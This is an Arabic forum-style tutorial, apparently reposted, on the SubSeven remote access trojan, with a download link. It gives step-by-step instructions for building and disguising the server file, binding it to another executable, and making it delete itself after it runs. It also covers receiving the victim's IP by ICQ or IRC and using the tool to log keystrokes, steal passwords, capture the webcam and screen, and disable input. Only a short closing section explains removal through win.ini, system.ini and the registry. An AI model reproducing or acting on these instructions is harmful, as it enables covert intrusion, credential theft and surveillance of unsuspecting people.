على بركت الله
ساشرح لكم احد برامج الاختراق وهو برنامج سهل جدا
بصراحة ترددت كثيرا في شرح هذا البرنامج لكي لا يستخدمه احد في الاعتداء على اصدقائه
واتمنى ان لا يحصل هذا لأنه برنامج خطير وله خواص قوية جداا
عند تنزيل البرنامج ستجدون في الفولدر ثلاث ملفات رئيسية
1) SupSeven هو البرنامج الذي يتم من خلاله التحكم وهو الذي يبقى في جهاز المستفيد وليس الضحيه وهو الذي يحتوي على جميع الوظائف .
2) server هو الملف الذي يرسل للضحيه ويمكنك تغيير اسمه وشكله او ربطه مع اي برنامج اخر كأغنيه او اي برنامج امتداده exe .
3) Edeit server هو البرنامج الذي يدعك تضع الاوامر في السيرفر قبل ارساله
وهو الذي يرسل لك رساله تخبرك بان الضحيه دخل النت وله عده فوائد تفيدك .
كيفية الدخول الى جهاز الضحيه ؟؟
يجب ارسال السيرفر ويجب على الضحيه فتح السيرفر ( لا يكفي انه استقبله بل
يجب عليه فتحه ) ومن ثم ستأتيك رساله من الضحيه لمعرفة الاي بي .. نفتح ملف
السب سفن وندخل رقم الاي بي وندخل البورت وغالبا مايكون البورت ( 27374 )
وبعد ذلك نضغط على conect ..... سوف يطلب منك الرقم السري ادخل الرقم الذي
ادخلته ( انت تختار الرقم ) وسوف يتم الاتصال بالضحيه وستظهر لك رساله في
الاسفل بها التاريخ بالعربي او الانكليزي هذا اذا دخلت جهاز الضحيه..
الحين إليكم شرح مكونات البرنامج :
في بدايه صفحة البرنامج نجد 7 اقسام :
1))القسم الاول : connection عند الضغط عليه سنجد( 5 )اختيارات وهي كالتالي :
1ـ1) ip scanner البحث عن الضحايا بتحديد الاي بي والبورت .
2ـ1) get pc info مواصفات جهاز الضحيه .
3ـ1) get home info مواصفات بيت الضحيه منها التليفون ( المعلومات اللي بهالجزء ماتبان الا اذا صاحب الجهاز خزنها في جهازه ) .
4ـ1) server options مواصفاة السيرفر الملف الذي يتيح لك التحكم بالضحيه (
هذه المعلومات يدخلها غير صاحب السيرفر الاصلي لتغيير معلومات السيرفر
السابقه ).
5ـ1) ip notify ربط الضحيه اما ( اي سي كيو ، ايرسي ، الايميل ) وهذه
المعلومات يدخلها غير صاحب السيرفر الاصلي لتغيير معلومات السيرفر القديمه .
القسم الثاني : keys/messages عند الضغط عليه سنجد ( 6 ) اختيارات وهي كالتالي :
1ـ2) keyboard سنجد تحته 5 اقسام وهي : open key logger فتح الستار . send
keys ربط اي برنامج عند الضحيه بزر من عنده تحدده انت . get offiline keys
ربط الضحيه بازرار الكي بورد بحيث ان لمس الزر نعرف انه دخل النت . clear
offiline keys الغاء الامر السابق . disable keyboard الغاء الكي بورد ولا
يستطيع رده نهائي حتى انت .
2-2) chat الشات التي تظهر عند الضحيه في منتصف الشاشه للتحدث معه .( ورفع ضغطه شوي )
3-2) matrix شات ماتركس اي امتلاك الشاشه بالشات .
4-2) msg manager علامات الخطا انت تضع علامات الخطا والملاحظه .
5-2) spy التحكم في الشات من الانواع اللي يذكرها لك.
6-2) icq takeover رؤية ارقام الاي سي كيو وشطب اي رقم تريد شطبه عند الضحيه .
القسم الثالث : advanced سنجد تحته ( 6 )اقسام :
1-3) ftp/http اسلوب من الاساليب لتنزيل او الارسال للضحيه .
2-3) find files البحث عن فايل معين عند الضحيه .
3-3) passwords الباسووردات الموجوده في الحهاز او المذكوره . ونجد تحته ( 6
) اقسام وهي: get cached passwords هو الباسوورد الذي دخل به النت واليوزر
نيم . get recorded password تخزيين الباسووردات ومسحها . show received
password جميع الباسووردات التي حصل عليها من قبل . retrieve ras password
باسوورد النت وبعض الباسووردات للبرامج . get icq password ارقام الاي سي
كيو . get iam password باسوورد الشات المذكور .
4-3) reg edit التحكم في ملفات الويندوز .
5-3) app redirect التحكم في اتجاه مايفعله الضحيه .
6-3) port erdirect تغيير البورت او الاي بي عند الضحيه .
القسم الرابع : miscellaneous سنجد تحته ( 6 ) اقسام :
1-4) fiel manager الملفات الرئيسية .
2-4) window manager التحكم في الويندوز وتشغيل واغلاق البرامج .
3-4) process manager التحكم في المعالج يعني الادوات الرئيسية في الجهاز .
4-4) text-2-speech كتابة رسالة الويف المطلوبه لتتحدث مع الضحيه بالسماعات .
5-4) clipboard manager اضافة بعض الاشياء .
6-4) irc dot التحكم في بورت الاي ار سي .
القسم الخامس: fun manager سنجد تحته اقسام :
1-5) desktop/wepcam سنجد تحته (3) خيارات وهي : open screen preview رؤية
الشاشه الرئيسية بكامل تغيراتها . full screen capture صوره من وضع شاشة
الضحيه الحالي . wepcam/quickam capture تشغيل الكاميرا ان وجد لدى الضحيه .
2-5) filp screen التحكم في الشاشه تغيرها من اليمين للشمال وقلبها .
3-5) print التحكم في طابعة الضحيه وطباعة اي شئ .
4-5) drowser التحكم في فتح اي موقع تريده .
5-5) resolution التحكم بالشاشة والملفات .
6-5) win colors التحكم في الوان الويندوز ...
القسم السادس: extra fun سنجد تحته اقسام :
1-6) screen sarver التحكم بشاشة التوقف .
2-6) restart win التحكم بالويندوز كاعادة التشغيل وغيره وسنجد تحته (5)
خيارات وهي: normal shut down اعادة تشغيل الكمبيوتر طبيعي . rorce windows
shutdown اطفاء جهاز الضحيه بالغصب . log off windows user تغيير اسم جهاز
الضحيه . shutdown and power off تقفيل الجهاز للضحيه تقفيل عادي . erboot
system تقفيل الجهاز .
3-6) mouse التحكم في سرعة الماوس واخفائها .
4-6) sound التحكم في صوت السماعات .
5-6) time/data التحكم في الوقت والزمن .
6-6) extra التحكم في خاصيات الجهاز مثل السي دي روم وغيره وتحته (10)
اختيارات وهي: dasktop التحكم في اخفاء الملفات والبرامج الموجوده على سطح
المكتب . start button اخفاء زر البدايه ستارت . taskdar اخفاء الشريط اللي
باسفل الشاشه . cd rom فتح واغلاق السي دي . speaker تشغيل السماعات التي
يتم الاتصال منها بداخل الجهاز بشكل مزعج . monitor اغلاق الشاشه . ctrl +
alt + delet عدم التحكم بهذه الخدمه . scroilock اختيار الاحرف الكبيرة
وليست الكابيتل اللي بالبورد . capslock اجبار الضحية بالكتابه بالاحرف
الكابيتل الكبيره . nume lock تشغيل الارقام اللي بيمين البورد.
القسم السابع والاخير: local options سنجد تحته اقسام :
1-7) quality التحكم في الكاميرا تكبير ونصغير ومشغلات الفيديو .
2-7) local tolder كل ضحيه له ملف عندك بحيث اي شي تنزله من جهازه تلقاه في ملفه .
3-7) client colors التحكم بالوان الويندوز الرئيسية .
4-7) misc options التحكم بالموسيقه .
5-7) advanced التحكم في بورت الشاشه .
6-7) run edit server كيفية صنع ملف السيرفر ووضع الاوامر فيه .
**************************************************
كيفية استخدام وزرع السيرفر في جهاز الضحيه ؟؟؟
1) نفتح ملف (dit server)ونضغط على كلمة(browse) وندخل ملف (server) من
فولدر السب سفن اللي عندنا بالجهاز فيصبح مكتوب c:/nuzipped/sub/server.exe
2) نذهب الى enabel icq notify to unin 935099 ونلغي الرقم ونكتب الرقم
الخاص بك انت .... ليه؟؟ لانه حين يدخل الضحيه للنت وتكون انت فاتح الاي سي
كيو الخاص بك فستاتيك رساله تخبرك بان الضحيه دخل النت ويوجد فيها الرقم
السري للسيرفر ، ورقم الاي بي ، واسم الضحيه ، وبياناتك اللي ادخلتها في
السيرفر .
3) نذهب للسطر اللي تحته مباشرة enable irc هذا السطر لكي نربطه مع الاميرسي
4) نذهب لاعلى اليمين chnge sever acon ونختار اي من الصور الموجوده ثم
نضغط على epply لكي تتغير صوره السيرفر الى التي تم اختيارها .
5) نذهب الى server passoword لندخل كلمه السر لحفظ السيرفر من عدم استخامه
من شخص (هاكر) اخر ، ندخل الباسوورد مره اخرى ونضع علامة امام المربع
المقابل له لكي تعمل هذه الخاصيه .
6) نضع علامة امام المربع المقابل للسطر هذا protect server and password .
7) melt server after installation وظيفة هذا السطر انه اذا ضغط الضحيه على
ملف السيرفر فسوف يختفي الملف في جهاز الضحيه ولا يستطيع ان يراه مره اخرى
فقط ضع علامة في المربع اللي قدامه اذا اردت تشغيله .
bind server with file لربط السيرفر مع اي ملف exe تضع علامة في المربع ثم تذهب الى browse وتدخل الملف المراد ربطه فيه .
9) protect editserver so it can`t be edit هنا نضع علامة في المربع المقابل في هذا السطر ونكتب الباسوورد ونعيد كتابته مرة ثانيه .
10) واخيرا نضغط على ....save anew copy of .
اهم ملاحظه لا يجوز تحميل السيرفر بالمعلومات مرتين .....!!
-------------------------------------------------------------
خطورة البرنامج :
يمكن عمل تعديلات على الخادم الخاص بالبرنامج من خلال برنامج التحرير الخاص
به لذلك فإنه من الواجب البحث في أي مكان ممكن أن يسجل فيه ليعمل تلقائيا
يعني أي مكان يمكن وضع أوامر للويندوز ليقوم بتشغيله تلقائيا .
التخلص منه :
1- افتح الملف win.ini الموجود في مجلد الويندوز وابحث في بداية السطور الأولى من هذا الملف عن أي قيم شبيهة بالقيم التـالية :
run=xxxx.exe أو run = xxxx.dll أو Load=xxxx.exe أو Load = xxxx.dll
لاحظ أن xxxx تعني اسم الخادم وإذا عثرت على أي قيمة منها فقم بحذفها
2- افتح الملف system.ini الموجود في مجلد الويندوز وفي السطر الخامس تقريباً ستجد السطر التالي : shell = Explorer.exe ...
فإذا كان جهازك مصابا ستجد السطر على هذا الشكل :
shell=Explorer.exe xxxx.exe .... أو shell = Explorer.exe xxxx.dll
مع العلم بأن xxxx هو إسم الخادم الذي من أشهر أسمائه rundll16.exe و
Task_Bar.exe و server.com او server.exe فإذا كان كذلك فقم بمسح إسم
الخادم فقط ليصبح السطر
: shell = Explorer.exe
**************************************
- إضغط على start ثم تشغيل ثم إكتب regedit لتدخل الى
ملف السجل ثم قم بالدخول تسلسليا على الأتي :
HKEY_LOCAL_MACHINE
Software
Microsoft
Windows
Current Version
داخل المجلد Run إبحث عن إسم الخادم الذي عثرت عليه في مــلف system.ini أو
الملف win.ini ( في بعض الأحيان قد يتغير إسم الخادم في ملف التسجيل لذلك
إبحث عن أي شي غريب ) ثم بعد ذلك توجه لمجلد الويندوز وستجد أن حجم الخادم
الذي عثرت عليه في ملف التسجيل حوالي 328 كيلو بايت إذا كان كذلك عد لنفس
المنطقة في ملف التسجيل وقم بحذف القيمة وذلك بالنقر على إسمها وإختيار حذف
delete الآن أعد تشغيل الجهاز ثم توجه لمجلد الويندوز وقم بحذف الخادم
بالنقر عليه بالزر الأيمن للماوس وإختيار حذف0
الشرح منقوووووووووووووول
التحمييييييييييييييل من هنا http://www.4shared.com/zip/5VbrVrzB/Sub7_22.html